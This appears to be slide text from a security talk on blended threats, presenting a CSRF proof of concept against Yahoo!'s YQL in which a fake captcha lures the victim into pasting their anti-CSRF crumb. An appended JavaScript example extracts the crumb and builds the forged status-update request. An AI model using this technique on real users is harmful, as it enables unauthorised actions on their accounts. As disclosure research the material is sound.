3. Blended Threat Concept
• It has no clear definition, because it is more
a concept than a single attack.
• But we have the following definitions from
different sites:
4. Blended Threat Concept
• Definition from Wikipedia:
“A blended threat is a software vulnerability which in turn involves
a combination of attacks against different vulnerabilities. For
example, many worms, trojan horses and computer viruses
exploit multiple techniques to attack and propagate. It is a kind
of computer threat.”
Link:
http://en.wikipedia.org/wiki/Blended_threat
5. Blended Threat Concept
• Definition from TrendMicro:
“(…) A blended threat refers to a single threat that attacks via
multiple vectors (e.g., a worm gains entry via email and then
leverages back-door vulnerabilities for further infection and
destruction).”
Link:
http://apac.trendmicro.com/apac/threats/enterprise/threats-summary/blended-threats/
6. Blended Threat Concept
• My own definition:
“A Blended Threat is an unbounded attack vector that
needs two or more different, mutually dependent
attacks in order to manipulate the usual
application logic.”
7. History of Blended Threats
• The person who introduced this kind of method
was Billy (BK) Rios
• In his presentation: “Will it Blend”
• With this P.o.C:
Blended Threat from Combined Attack Using Apple’s
8. The P.o.C
My proof of concept is:
• In a Yahoo! service called YQL
• Based on CSRF and one user interaction
In this presentation I will show a method to
execute YQL commands without the console,
more exactly:
! To change the status in the Yahoo! Profile
YQL = Yahoo Query Language
9. What is YQL
YQL is:
• A SQL-like language
• A cloud service
• We can create APIs, or use other APIs and
manipulate the results in the “cloud”
• We can run authenticated YQL
commands against Yahoo! Inbox or Yahoo! Profile
10. YQL – Open Data Tables
• It is a way to connect to a remote web
API (endpoint) and to describe what to
do with the data that comes back
• How it looks:
12. YQL – Use verb
• We can use simple server-side JavaScript in the
<execute> tag of the table XML; here are some examples:
• To build and send a request we use the request object:
request.accept('application/json')
.header('Authorization', '…')
.query('searchterm', 'foo').get()
• response.object passes the final result back to the user:
response.object = data
13. YQL – JS API
• Some key features, what it can do:
- use external JS files
- convert between XML and JSON
- run other YQL queries inside the same YQL query
14. How it looks in the console
Link: http://developer.yahoo.com/yql/console/#h=update%20social.profile.status%20set%20status%3D%22EasterEgg%22%20where%20guid%3Dme
15. How it looks in the request
• First, the console reads the crumb (the Yahoo!
anti-CSRF token)
• Second, the console sends the YQL
command together with the crumb to the “cloud”
16. First Step: Read the crumb
Note: The crumb is generated whether or not the user is logged in
19. The P.o.C
• I have the “location” of the crumb
• I know where to send the data, but how do I
convince the user to give us the crumb?!
• It is simple …
20. Meanwhile …
• Why do dogs (and other animals) eat
poop?
“Herbivores such as rabbits eat their own poop because their
diet of plants is hard to digest efficiently, and they have to make
two passes at it to get everything out of the meal.”
21. The P.o.C
This is another version of the attack named “Fake Captcha” by
Kotowicz: the victim is led to copy the crumb out of the page and paste it into a fake captcha field
23. How to check the status
We can confirm the change by using the YQL command:
Link: http://developer.yahoo.com/yql/console/#h=select%20message%20from%20social.profile.status%20where%20guid%3Dme
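The steps on slides 15 to 23 (read the crumb, send the YQL command with it, confirm the new status) as one worked example. This is added code, not code from the presentation and not Yahoo!'s: only the two YQL statements and the console URL prefix come from the slides. The pasted text the victim hands over through the fake captcha, the submit endpoint, the form field names and the JSON result layout are assumptions made for illustration.

```javascript
"use strict";
// Added example for the YQL PoC (slides 15 to 23). Not from the original
// presentation and not Yahoo!'s code. Only UPDATE_STATUS, READ_STATUS and
// CONSOLE_URL come from the slides; everything else is assumed.

const CONSOLE_URL = "http://developer.yahoo.com/yql/console/#h=";
// Hypothetical stand-in for the endpoint the console submits to (not a real URL).
const SUBMIT_URL = "https://yql.example.invalid/submit";

// The two statements used in the slides: change the status, then read it back.
const UPDATE_STATUS = 'update social.profile.status set status="EasterEgg" where guid=me';
const READ_STATUS = "select message from social.profile.status where guid=me";

// Console deep link as shown on the slides: the statement is URL-encoded after "#h=".
function consoleUrl(yql) {
  return CONSOLE_URL + encodeURIComponent(yql);
}

// Step 1: recover the crumb from whatever the victim pasted into the fake
// "captcha" field. Assumed format: the word "crumb", a short separator, the token.
const CRUMB_PATTERN = /crumb\W{0,4}([A-Za-z0-9._\/-]{8,})/;

function extractCrumb(pasted) {
  const m = CRUMB_PATTERN.exec(pasted);
  return m ? m[1] : null;
}

// Step 2: the request the console would send, now forged by the attacker's page
// and carried with the victim's own cookies. Field names are assumptions.
function buildSubmitRequest(yql, crumb) {
  const body = new URLSearchParams({ q: yql, crumb: crumb, format: "json" });
  return { method: "POST", url: SUBMIT_URL, body: body.toString() };
}

// Whole flow: without a recovered crumb the attack stops here.
function forgeStatusUpdate(pasted) {
  const crumb = extractCrumb(pasted);
  return crumb ? buildSubmitRequest(UPDATE_STATUS, crumb) : null;
}

// Step 3 (slide 23): confirm the change with the select statement. YQL wraps
// results as {"query":{"results":...}}; the inner layout assumed here for
// social.profile.status is a guess, so the lookup is kept tolerant.
function statusFromResponse(json) {
  const results = json && json.query && json.query.results;
  if (!results) return null;
  const row = results.status || results;
  return typeof row.message === "string" ? row.message : null;
}

// Constructed sample inputs (not captured from Yahoo!).
const SAMPLE_PASTE = "YQL console\ncrumb=a1B2c3D4e5F6\n";
const SAMPLE_RESPONSE = { query: { count: 1, results: { status: { message: "EasterEgg" } } } };

// Usage: node yql_poc_example.js
console.log(consoleUrl(UPDATE_STATUS));
console.log(forgeStatusUpdate(SAMPLE_PASTE));
console.log(consoleUrl(READ_STATUS), "->", statusFromResponse(SAMPLE_RESPONSE));
```

The forged request only works because the crumb, once the victim has pasted it, is accepted with the victim's cookies. The user interaction is the weak link of the PoC: the fake captcha needs the victim to copy text out of the console page, so a page that cannot be framed and does not render the crumb as selectable text removes that copy path.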
25. Credits
• Billy (BK) Rios
• Kotowicz
• Dragan European University, Lugoj, Timiș
• Dan Kaminsky: in 2008 he “own-ed” the
internet. His work must not be forgotten!